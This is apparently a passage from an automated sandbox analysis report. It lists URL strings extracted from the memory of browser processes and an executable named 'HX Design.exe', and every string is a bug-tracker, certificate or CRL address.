              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1924973398.000076D80000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6953
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1928927415.000076D800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7036
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1924973398.000076D80000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7047
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7172
              Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7172h
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7279
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1928927415.000076D800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7370
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1924973398.000076D80000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7406
              Source: chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7406/
              Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7488
              Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7553
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7556
              Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/75563
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1928927415.000076D800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7724
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7760
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1928927415.000076D800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7761
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8162
              Source: chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8162/
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8215
              Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8215g
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8229
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1928927415.000076D800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8280
              Source: HX Design.exe, 00000000.00000003.1676326380.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668492693.000001631A8D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digi
              Source: HX Design.exe, 00000000.00000003.1668959482.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669052260.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678769674.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668871485.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669276073.000001631A8DD000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678769674.000001631A8DE000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678932216.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668118244.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668746422.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668871485.000001631A8DD000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669162897.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1680565460.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1676326380.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668028713.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668653035.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1675375438.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1677063982.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1676435371.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668492693.000001631A8D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: HX Design.exe, 00000000.00000003.1668959482.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669052260.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678769674.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668871485.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678932216.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668118244.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668746422.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669162897.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1680565460.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1676326380.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668028713.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668653035.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1675375438.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1677063982.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1676435371.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668492693.000001631A8D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
              Source: HX Design.exe, 00000000.00000003.1668959482.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669052260.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678769674.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668871485.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678932216.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668118244.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668746422.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669162897.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1680565460.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1676326380.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668028713.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668653035.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1675375438.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1677063982.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1676435371.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668492693.000001631A8D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: HX Design.exe, 00000000.00000003.1668959482.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669052260.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678769674.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668871485.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669276073.000001631A8DD000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678769674.000001631A8DE000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678932216.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668118244.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668746422.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668871485.000001631A8DD000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669162897.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1680565460.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1676326380.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668028713.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668653035.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1675375438.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1677063982.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1676435371.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668492693.000001631A8D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: HX Design.exe, 00000001.00000003.2096462024.00000294B4748000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088968659.00000294B4748000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2099503241.00000294B47A9000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2097242552.00000294B47A8000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.1705144550.00000294B4787000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
              Source: HX Design.exe, 00000001.00000002.2102278462.00000294B542F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2096854366.00000294B542F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
              Source: HX Design.exe, 00000000.00000003.1677851703.000001631A8D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: HX Design.exe, 00000001.00000002.2098822310.00000294B4410000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2100033257.00000294B4A50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: HX Design.exe, 00000001.00000003.2095387308.00000294B4E00000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088687906.00000294B4DF5000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088801759.00000294B4DFC000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2100033257.00000294B4B1F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2101063626.00000294B4E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl
              Source: HX Design.exe, 00000001.00000002.2102278462.00000294B542F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2096854366.00000294B542F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl
              Source: HX Design.exe, 00000001.00000002.2102278462.00000294B542F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2096854366.00000294B542F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crlk
              Source: HX Design.exe, 00000000.00000003.1677851703.000001631A8D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
              Source: HX Design.exe, 00000001.00000003.2095387308.00000294B4E00000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088687906.00000294B4DF5000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088801759.00000294B4DFC000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2101063626.00000294B4E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl
              Source: HX Design.exe, 00000001.00000003.2095458820.00000294B4C80000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2100464730.00000294B4C80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
              Source: HX Design.exe, 00000001.00000003.2095387308.00000294B4E00000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088687906.00000294B4DF5000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088801759.00000294B4DFC000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2101063626.00000294B4E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crlests
              Source: HX Design.exe, 00000001.00000003.2095387308.00000294B4E00000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088687906.00000294B4DF5000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088801759.00000294B4DFC000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2101063626.00000294B4E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl
              Source: HX Design.exe, 00000001.00000003.2095458820.00000294B4C80000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2100464730.00000294B4C80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
              Source: HX Design.exe, 00000001.00000003.2095387308.00000294B4E00000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088687906.00000294B4DF5000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088801759.00000294B4DFC000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2101063626.00000294B4E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crlor
              Source: HX Design.exe, 00000000.00000003.1677851703.000001631A8D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
              Source: svchost.exe, 0000003C.00000002.2922318040.00000298F7800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
              Source: HX Design.exe, 00000001.00000003.2095387308.00000294B4E00000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088687906.00000294B4DF5000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088801759.00000294B4DFC000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2101063626.00000294B4E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
              Source: HX Design.exe, 00000001.00000002.2100033257.00000294B4A50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
              Source: HX Design.exe, 00000000.00000003.1668959482.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669052260.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678769674.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668871485.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669276073.000001631A8DD000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678769674.000001631A8DE000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678932216.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668118244.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668746422.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668871485.000001631A8DD000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669162897.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1680565460.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1676326380.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668028713.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668653035.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1675375438.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1677063982.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1676435371.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668492693.000001631A8D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: HX Design.exe, 00000000.00000003.1668959482.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669052260.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678769674.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668871485.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678932216.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668118244.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668746422.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669162897.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1680565460.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1676326380.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668028713.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668653035.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1675375438.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1677063982.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1676435371.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668492693.000001631A8D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
